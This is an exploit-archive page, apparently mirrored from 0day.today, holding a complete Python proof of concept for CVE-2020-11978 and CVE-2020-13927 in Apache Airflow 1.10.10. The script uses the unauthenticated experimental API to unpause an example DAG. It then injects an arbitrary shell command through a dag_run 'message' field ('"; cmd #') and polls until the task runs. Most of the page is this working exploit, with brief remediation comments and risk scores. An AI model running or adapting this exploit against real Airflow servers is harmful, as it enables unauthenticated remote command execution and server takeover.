Apache Airflow 1.10.10 - (Example Dag) Remote Code Execution Exploit

🗓️ 02 Jun 2021 00:00:00Reported by Pepe BerbaType

zdt🔗 0day.today👁 145 Views

Apache Airflow 1.10.10 Example Dag Remote Code Executio

Reporter	Title	Published	Views	Family All 57
0day.today	Apache Airflow 1.10.10 Remote Code Execution Exploit	19 Sep 202300:00	–	zdt
Gitee	Exploit for OS Command Injection in Apache Airflow	6 Sep 202512:42	–	gitee
GithubExploit	Exploit for OS Command Injection in Apache Airflow	22 May 202115:58	–	githubexploit
ATTACKERKB	CVE-2020-13927	10 Nov 202000:00	–	attackerkb
ATTACKERKB	CVE-2020-11978	17 Jul 202000:00	–	attackerkb
Tenable Nessus	Apache Airflow < 1.10.11 Multiple Vulnerabilities	13 Jun 202200:00	–	nessus
BDU FSTEC	The vulnerability of the software responsible for creating, monitoring, and orchestrating data processing scripts in Airflow lies in the failure to take measures to neutralize special elements used in the OS commands. This allows a malicious actor to execute arbitrary commands with superuser privileges.	10 Feb 202200:00	–	bdu_fstec
BDU FSTEC	The vulnerability of the software component responsible for creating, monitoring, and orchestrating data processing scripts in Airflow allows attackers to circumvent existing access restrictions and execute API requests without authentication.	10 Feb 202200:00	–	bdu_fstec
Circl	CVE-2020-11978	3 Jun 202100:39	–	circl
Circl	CVE-2020-13927	10 Nov 202018:27	–	circl

# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution 
# Exploit Author: Pepe Berba
# Vendor Homepage: https://airflow.apache.org/
# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html
# Version: <= 1.10.10
# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)
# CVE : CVE-2020-11978
# 
# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow
# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default.
# Together, potentially allows unauthenticated RCE to Airflow 
# 
# Repo: https://github.com/pberba/CVE-2020-11978
# More information can be found here:  
# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E
# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
#
# Remediation:
# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set.
# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG.
#
# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 "touch test"

import argparse
import requests
import sys
import time

def create_dag(url, cmd):
	print('[+] Checking if Airflow Experimental REST API is accessible...')
	check = requests.get('{}/api/experimental/test'.format(url))

	if check.status_code == 200:
		print('[+] /api/experimental/test returned 200' )
	else:
		print('[!] /api/experimental/test returned {}'.format(check.status_code))
		print('[!] Airflow Experimental REST API not be accessible')
		sys.exit(1)

	check_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))
	if check_task.status_code != 200:
		print('[!] Failed to find the example_trigger_target_dag.bash_task')
		print('[!] Host isn\'t vunerable to CVE-2020-11978')
		sys.exit(1)
	elif 'dag_run' in check_task.json()['env']:
		print('[!] example_trigger_target_dag.bash_task is patched')
		print('[!] Host isn\'t vunerable to CVE-2020-11978')
		sys.exit(1)
	print('[+] example_trigger_target_dag.bash_task is vulnerable')

	unpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))
	if unpause.status_code != 200:
		print('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded')
		sys.exit(1)
	else:
		print('[+] example_trigger_target_dag was enabled')

	print('[+] Creating new DAG...')
	res = requests.post(
	    '{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),
	    json={
	        'conf': {
	                'message': '"; {} #'.format(cmd)
	        }
	    }
	)

	if res.status_code == 200:
		print('[+] Successfully created DAG')
		print('[+] "{}"'.format(res.json()['message']))
	else:
		print('[!] Failed to create DAG')
		sys.exit(1)

	wait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(
		url = url,
		execution_date=res.json()['execution_date']
	)

	start_time = time.time()
	print('[.] Waiting for the scheduler to run the DAG... This might take a minute.')
	print('[.] If the bash task is never queued, then the scheduler might not be running.')
	while True:
		time.sleep(10)
		res = requests.get(wait_url)
		status = res.json()['state']
		if status == 'queued':
			print('[.] Bash task queued...')
		elif status == 'running':
			print('[+] Bash task running...')
		elif status == 'success':
			print('[+] Bash task successfully ran')
			break
		elif status == 'None':
			print('[-] Bash task is not yet queued...'.format(status))
		else:
			print('[!] Bash task was {}'.format(status))
			sys.exit(1)

	return 0


def main():
	arg_parser = argparse.ArgumentParser()
	arg_parser.add_argument('url', type=str, help="Base URL for Airflow")
	arg_parser.add_argument('command', type=str)
	args = arg_parser.parse_args()

	create_dag(
		args.url, 
		args.command
	)

if __name__ == '__main__':
	main()

02 Jun 2021 00:00Current

9.3High risk

Vulners AI Score9.3

CVSS 27.5

CVSS 3.19.8

EPSS0.997